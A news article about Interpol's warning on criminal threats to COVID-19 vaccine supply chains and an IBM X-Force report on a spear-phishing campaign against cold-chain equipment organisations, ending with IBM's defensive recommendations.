Hard on the heels of an Interpol warning this week that criminals are targeting COVID-19 vaccine supply chains comes an IBM report about an under threat distribution network of the now-valuable serum.
On Thursday, Interpol, the international police co-operative, issued an Orange Notice of potential criminal activity, including the falsification, theft and illegal advertising of COVID-19 and flu vaccines. With COVID vaccines about to get final approval from national health authorities and distribution expected to begin within weeks, there is tremendous value in what is hoped will be a serum that will snuff out the pandemic.
“As governments are preparing to roll out vaccines, criminal organizations are planning to infiltrate or disrupt supply chains.” Interpol secretary general Jürgen Stock said in a release. Some threat actors are already advertising fake vaccines, the statement added. As international travel gradually resumes, the production and sale of fake virus testing kits are also likely, it said. “It is essential that law enforcement is as prepared as possible for what will be an onslaught of all types of criminal activity linked to the COVID-19 vaccine, which is why Interpol has issued this global warning.”
While the Interpol statement wasn’t specific, criminals might think the vaccine could be sold in less developed countries where it won’t be distributed as fast as Western nations who have already put down tens of millions in advance for doses. Or they might think companies in the distribution network would be highly vulnerable to paying data theft blackmail or ransomware threats to ensure their firms’ reputation and to keep shipping supplies. Nation-states may want the intellectual property to buttress their vaccine production effort.
The Interpol statement didn’t give a specific example of a threat, but this morning IBM Security’s X-Force threat intelligence service said one has been going on since September aimed at a very narrow part of the vaccine distribution chain: The network that makes specialized cold storage equipment.
“The COVID-19 phishing campaign spanned across six countries and targeted organizations likely associated with Gavi, The Vaccine Alliance’s Cold Chain Equipment Optimization Platform (CCEOP) program,” the report says. “While firm attribution could not be established for this campaign, the precision targeting of executives and key global organizations hold the potential hallmarks of nation-state tradecraft.”
According to IBM, someone pretending to be a business executive from Haier Biomedical, a qualified Chinese-based supplier for the CCEOP program, sent spear-phishing emails to organizations believed to be providers of material support to meet transportation needs within the COVID-19 cold chain.
The targets included the European Commission’s Directorate-General for Taxation and Customs Union and organizations within the energy, manufacturing, website creation and software, and internet security solutions sectors. Impacted countries include Germany, Italy, South Korea, Czech Republic, greater Europe and Taiwan.
It’s highly likely that the adversary strategically chose to impersonate Haier Biomedical because it’s purported to be the world’s only complete cold chain provider, said the report. The messages made requests for quotations (RFQ) related to the CCEOP program. But they contain malicious HTML attachments that open locally, prompting recipients to enter their credentials to view the file. This phishing technique helps attackers avoid setting up phishing pages online that can be discovered and taken down by security research teams and law enforcement.
IBM says it isn’t clear if any of the attacks were successful. It suspects the goal was to harvest credentials, possibly to gain future unauthorized access to corporate networks and sensitive information relating to the COVID-19 vaccine distribution. Moving laterally through networks and remaining there in stealth would allow them to conduct cyber espionage and collect confidential information from the victim environments for future operations.
The precision targeting leads IBM to suspect a country was behind this campaign. Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets, it argues.
IBM said organizations in the vaccine supply chain should:
- Create and test incident response plans to strengthen your organization’s preparedness and readiness to respond in the event of an attack;
- Share threat intelligence;
- Assess your third-party ecosystem and assess potential risks introduced by third-party partners. Confirm you have robust monitoring, access controls and security standards in place that third-party partners need to abide by;
- Apply a zero-trust approach to your security strategy to manage privileged data access;
- Use Multifactor Authentication (MFA) across your organization as protection in case a threat actor steals passwords;
- Conduct regular email security educational trainings so employees remain on alert about phishing tactics and are familiar with email security best practices;
- Use endpoint protection and response tools to more readily detect and prevent threats from spreading across the organization.
